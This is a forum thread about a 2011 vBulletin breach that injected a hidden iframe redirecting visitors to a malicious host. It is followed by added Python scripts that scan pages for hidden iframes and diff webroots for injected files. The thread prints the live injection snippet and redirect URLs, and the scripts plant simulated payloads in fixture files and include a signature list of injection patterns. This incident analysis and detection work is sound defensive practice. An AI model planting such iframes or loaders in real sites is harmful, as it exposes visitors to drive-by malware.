#1 squirrel

    RPS Forums Site Contains Malicious Ware?

I am using avast!, and here is the warning it gives whenever I open a new page within the forum:

    Infection Details
    URL: http://kokosina.in/1
    Process: file://C:\Program Files (x86)\Mozilla Fi...
    Infection: al

    I suspect it's the advertisement that has a problem, as the background advertisement is currently blocked by my machine.

    It's so creepy zako!

#2 thegooseking
    I posted about this in forum feedback. It's affecting a lot of vBulletin sites and there's a thread about it here.
    "Moronic cynicism is a kind of naïveté. It's naïveté turned inside-out. Naïveté wearing a sneer." -Momus

#3 lhzr
Yeah, I get this too.

    Should we consider our passwords stolen? What does this kokosina thing do?

#4 Vexing Vision
    Same, but I get the error message also for the main page, where background ads are running fine.
    NETWORKING 101 SIGNATURE INCOMING
    Playing games with each other makes for the best business contacts, so feel free to add me on LinkedIn.
    You should also follow me on Twitter.

#5 Kaira-
Not sure if it's always been there, but I noticed that the browser attempts to connect to 212.224.112.13, and the whois for that looks like this:


    inetnum: 212.224.112.0 - 212.224.112.255
    netname: DE-FORNEX
    descr: www.fornex.com, Fornex Hosting S.L
    country: DE
    admin-c: COLO-RIPE
    tech-c: COLO-RIPE
    remarks: -------------------------------------------------------
    remarks: --- please report spam/abuse to abuse@first-colo.de ---
    remarks: ---- reports to other addresses won't be processed ----
    remarks: -------------------------------------------------------
    status: ASSIGNED PA
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

    role: First Colo Ripe Coordination
    address: First Colo GmbH
    address: Kastelburgstr. 74c
    address: D-81245 Muenchen
    address: Germany
    phone: +49-(0)800-25557777
    fax-no: +49-(0)800-25557770
    abuse-mailbox: abuse@first-colo.de
    remarks:
    remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    remarks: * Complaints about Internet Abuse like SPAM, Hack Attacks, Scans, etc. *
    remarks: * please mail to: --> abuse [@] first-colo [.] net <-- *
    remarks: * Requests from law enforcement (only!), send fax to: +49 800 25557770 *
    remarks: * Inquiries can only be processed, if sent to the correct address. *
    remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    remarks:
    admin-c: MAVE-RIPE
    tech-c: MAVE-RIPE
    nic-hdl: COLO-RIPE
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

    % Information related to '212.224.64.0/18AS44066'

    route: 212.224.64.0/18
    descr: First Colo via AS44066
    origin: AS44066
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

    % Information related to '212.224.112.0/20AS44066'

    route: 212.224.112.0/20
    descr: First Colo via AS44066
    origin: AS44066
    mnt-by: MNT-FIRSTCOLO
    source: RIPE # Filtered

#6 Miker
    Same here, I had to put RPS in my exceptions just to get here.

#7 Duckee
    It is also flagged by Opera as a malware threat.

#8 Megagun
    WARNING: do NOT visit any of the links I'm about to post unless you know what you're doing, you think you know what you're doing, or you don't care what happens to your PC either way. That said, some of these links I'm about to post should be safe, and I'll mark them as such.

Yep, there's definitely something wrong here. This is what I found inside the source of this page:
    Code:
    <div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
    Awesome, an iFrame!
    Wgetting the kokosina.in URL gives me a 302 redirect to
    Code:
    http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/spl.php
    Following that, we get another 302 redirect to
    Code:
    http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/0.php
    Which in turn redirects to http://www.google.com/robots.txt for some reason, which is rather odd... Why would they redirect me to google's robots.txt?

    EDIT: the iFrame is injected by the following bit of javascript code:
    http://pastebin.com/XsmMHBza (this should be safe to visit if you want to look at some JavaScript, but don't be alarmed if your virus scanner thinks this is a virus, too. Some do that).

    I've seen that kind of thing before. Nasty decoding/evalling stuff. This bit of javascript is hosted at
    Code:
    http://kokosina.in/1
    Virustotal's output for that little bit of Javascript (this is a safe link). Oddly enough, it's not detected by many virus scanners, but I bet that they do detect whatever the output of that bit of Javascript is (the actual iFrame injection).

    EDIT: Checked the link posted by thegooseking, which says the following:
    You're using vBulletin 4.1.3. There are several exploits in that version that were fixed in subsequent versions and security patches. You should upgrade to vBulletin 4.1.9. You also need to make sure your addons are up to date so that they don't have potential exploits in them.
    The RPS forums are running 4.1.3. There are known exploits for that version. The forum software should be updated. Someone used a known exploit to inject some code (probably automatically), which means they probably have (had?) access to the server, which may mean that they know your password, depending on what they modified. Be vigilant, but changing your password now may be a bit silly until the forum software has been patched to deal with this intrusion. That said, I know that vBulletin by default uses some proper salting techniques, so you might be somewhat safe (again, depending on which files were modified, and in what way they were modified).
    Last edited by Megagun; 20-12-2011 at 08:59 PM. Reason: Moved the JavaScript to Pastebin, so that my post isn't flagged as containing a virus by your virus scanner. :)
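The hidden-iframe check that Megagun did by reading the page source, as an added example that is not part of the original thread or of vBulletin: a small Python scanner that walks a fetched page once and reports every iframe that is inside a `display:none`/`visibility:hidden` element or is too small to be meant for a human, noting whether its host differs from the page's host. The sample page is constructed here (it embeds the exact snippet quoted above next to a normal, visible embed), the page host is an assumption, and nothing is fetched from the network, so the kokosina.in URL is never followed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: the hidden-iframe snippet quoted in the thread,
# dropped into an otherwise ordinary page next to a legitimate visible embed.
SAMPLE_HTML = """<html><body>
<h1>Rock, Paper, Shotgun Discussion</h1>
<p>Normal forum content.</p>
<div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
<iframe src="https://www.youtube.com/embed/xyz" width="560" height="315"></iframe>
</body></html>"""

# Elements that never get a closing tag; they must not be pushed on the stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "param", "source", "track", "wbr"}

# Frames with a smaller area than this are not meant to be seen by a user.
MIN_VISIBLE_AREA = 100 * 100


def style_hides(style):
    """True if an inline style makes the element invisible."""
    s = (style or "").replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s


class HiddenIframeScanner(HTMLParser):
    """Walk the markup once, remembering whether we are inside a hidden
    element, and record every iframe that is hidden, tiny, or both."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.stack = []          # one bool per open element: hidden or not
        self.hidden_depth = 0    # number of open hidden ancestors
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden_here = style_hides(a.get("style"))
        if tag == "iframe":
            self.check_iframe(a, hidden_here or self.hidden_depth > 0)
        if tag not in VOID_TAGS:
            self.stack.append(hidden_here)
            if hidden_here:
                self.hidden_depth += 1

    def handle_endtag(self, tag):
        # Assumes reasonably well-formed markup; a stray end tag just pops.
        if self.stack and self.stack.pop():
            self.hidden_depth -= 1

    def check_iframe(self, a, hidden):
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if hidden:
            reasons.append("inside a hidden element")
        try:
            # 300x150 are the HTML defaults when width/height are absent.
            w, h = int(a.get("width", 300)), int(a.get("height", 150))
        except ValueError:           # percentages etc.: treat as visible
            w, h = 300, 150
        if w * h < MIN_VISIBLE_AREA:
            reasons.append("tiny frame %dx%d" % (w, h))
        if not reasons:
            return                   # visible, normal-sized embeds are fine
        third_party = bool(host) and host != self.page_host \
            and not host.endswith("." + self.page_host)
        self.findings.append({"src": src, "host": host,
                              "third_party": third_party, "reasons": reasons})


def find_hidden_iframes(html, page_host):
    """Return a list of suspicious iframes found in html served by page_host."""
    scanner = HiddenIframeScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    # page_host is an assumption for the constructed sample.
    for f in find_hidden_iframes(SAMPLE_HTML, "www.rockpapershotgun.com"):
        print(f["src"], "third-party" if f["third_party"] else "same-site",
              "; ".join(f["reasons"]))
```

Run it against saved page source (`curl -s URL > page.html` from a machine you do not mind being touched, then feed the file in) rather than in a browser, because the point is to find the frame without ever rendering it. A frame injected by JavaScript after load, as Megagun's EDIT describes, will not be in the static source; for that case save the DOM after load or inspect the injecting script itself.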

#9 Ice-Fyre
    Sooo is the site safe now or not...

#10 Kodeen
    Quote Originally Posted by Ice-Fyre:
    Sooo is the site safe now or not...
    They upgraded the forum version, I'm assuming in response to this thread, so ... maybe?

#11 Jams O'Donnell
    Yes, the malware has been eliminated.

#12 Megagun
    Regardless, change your password and remember to change it on other websites where you used the same password. If someone was able to inject an iFrame, they were able to inject other nasty stuff.

As far as I was able to detect, the nasty bits we talked about in this thread have been cleaned up and fixed. Not sure if there's more nastiness somewhere else, but at least this particular case of nastiness has been dealt with.

#13
    Would be nice if RPS could post a quick bit on the front page that they've been compromised and that people should consider taking protective measures.
    "You go up to a man, and you say, "How are things going, Joe?" and he says, "Oh fine, fine — couldn't be better." And you look into his eyes, and you see things really couldn't be much worse. When you get right down to it, everybody's having a perfectly lousy time of it, and I mean everybody. And the hell of it is, nothing seems to help much." - Kurt Vonnegut, Jr.

#14 Smashbox
    Or at least a thread...

#15 Megagun
    *tumbleweed*

#16 DigitalSignalX
    Didn't the upgrade to 4.1.9 fix it?
    All times I have enjoyed greatly, have suffered greatly, both with those that loved me, and alone.

#17 Megagun
    Yes, it may have (it depends on what the breach was and if anything other than the forum software was affected), but no-one who has an account here and happens to read the "Rock, Paper Shotgun Discussion" forum would know about what happened, and nowhere was anything clarified with regards to what happened and how severe the breach was.

    Right now, we have to assume that all passwords and user accounts/e-mail addresses were stolen, until we hear some official words regarding these matters (and proper investigation has been done). This also means that not sending a mass-email out to anyone who has an account here is a huge oversight.

#18 kirrus
    I've been meaning to post for a while, sorry, didn't quite get round to it.

    The forums were breached by an injection vulnerability in vBulletin. It was an automated breach - very, very little human involvement. It didn't go beyond the forums - the main site was unaffected (hence it staying online when we took the forums offline). As far as we can determine, they didn't steal any data, and only injected nefarious code into the site. It was cleaned out after we took the forums down - we took a copy of the code, reloaded the forum files from backups, updated the forums and brought them back online.

    As to password security, they are stored salted and encrypted. As with any security matter, using the same password on multiple sites, as tempting as it is, is a bad idea, and we recommend against you doing that.

    The reason an email didn't go out, was due to the lack of data theft - be assured, we would ask the RPS team to let you know if we did have evidence of emails/passwords/usernames being downloaded.
    Last edited by kirrus; 11-01-2012 at 01:50 PM. Reason: Added a bit.
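The clean-up kirrus describes (keep a copy of the compromised tree, reload from backup, update) relies on knowing which files the injection touched. As an added example, not the forum's own tooling and not vBulletin code, here is a Python script that hashes a known-good backup and the live webroot, lists added, modified and removed files, and greps the changed ones for the kind of strings seen in this incident (a hidden iframe, the kokosina.in host, `eval(base64_decode(...))`). Both directory trees are constructed in a temp directory inside the script, so the file names, contents and the injected payload are all assumptions made for the demo.

```python
import hashlib
import os
import re
import tempfile

# Strings that rarely belong in a forum's own PHP or templates but are the
# bread and butter of automated injections. The last one is the host from
# this thread; the others are generic.
SUSPICIOUS = [
    re.compile(p, re.I) for p in (
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)",
        r"<iframe[^>]*>",
        r"display\s*:\s*none",
        r"document\.write\s*\(\s*unescape",
        r"kokosina\.in",
    )
]


def build_fixture():
    """Constructed stand-in for the backup and the live webroot.
    Not real vBulletin files; just enough to exercise the diff."""
    base = tempfile.mkdtemp(prefix="webroot-")
    backup, live = os.path.join(base, "backup"), os.path.join(base, "live")
    clean = {
        "index.php": "<?php\nrequire_once('./global.php');\necho 'forum home';\n",
        "includes/functions.php": "<?php\nfunction vb_hello() { return 'hi'; }\n",
        "images/misc/logo.txt": "not really an image\n",
    }
    for root in (backup, live):
        for rel, body in clean.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
    # The simulated injection: one legitimate file gets a trailing obfuscated
    # loader, and one new file appears in a directory that should only hold images.
    with open(os.path.join(live, "includes/functions.php"), "a") as fh:
        fh.write("<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>\n")
    with open(os.path.join(live, "images/misc/x.php"), "w") as fh:
        fh.write("<?php echo '<div style=\"display:none;\"><iframe src=\"http://kokosina.in/t/go.php?sid=5\"></iframe></div>'; ?>\n")
    return backup, live


def hash_tree(root):
    """Map every file under root (relative, forward-slash path) to its SHA-256."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            out[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return out


def grep_suspicious(path):
    """Return the patterns (as strings) that match anywhere in the file."""
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    return [p.pattern for p in SUSPICIOUS if p.search(text)]


def compare_webroots(backup, live):
    """Return added/modified/removed paths plus signature hits on the added
    and modified files, which are the ones worth a human look first."""
    b, l = hash_tree(backup), hash_tree(live)
    added = sorted(set(l) - set(b))
    removed = sorted(set(b) - set(l))
    modified = sorted(p for p in set(b) & set(l) if b[p] != l[p])
    hits = {p: grep_suspicious(os.path.join(live, p)) for p in added + modified}
    return {"added": added, "modified": modified, "removed": removed,
            "hits": {p: h for p, h in hits.items() if h}}


if __name__ == "__main__":
    report = compare_webroots(*build_fixture())
    for key in ("added", "modified", "removed"):
        print(key, report[key])
    for path, sigs in report["hits"].items():
        print("suspicious:", path, sigs)
```

Two caveats for a real vBulletin install. First, do the comparison on the copy you took before restoring, as kirrus did, so the evidence survives the clean-up. Second, a file diff is necessary but not sufficient: vBulletin keeps templates and plugin (hook) code in the database, which is a common place for automated injections to put an iframe, so the same signatures should also be run over a dump of those tables, and the forum's own config (`includes/config.php`) should be checked for changed database credentials.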

#19 Obscure Node
    Oh man, I hope I don't get that malware. Aww. (My computer is sensitive.)

#20 QuantaCat (Moderator)
    Last warning: stop posting on threads just to get your post count up. This is a thread that stopped being useful two years ago.
    - Tom De Roeck.

    monochrom & verse publications

    "Quantacat's name is still recognised even if he watches on with detached eyes like Peter Molyneux over a cube in 3D space, staring at it with tears in his eyes, softly whispering... Someday they'll get it."
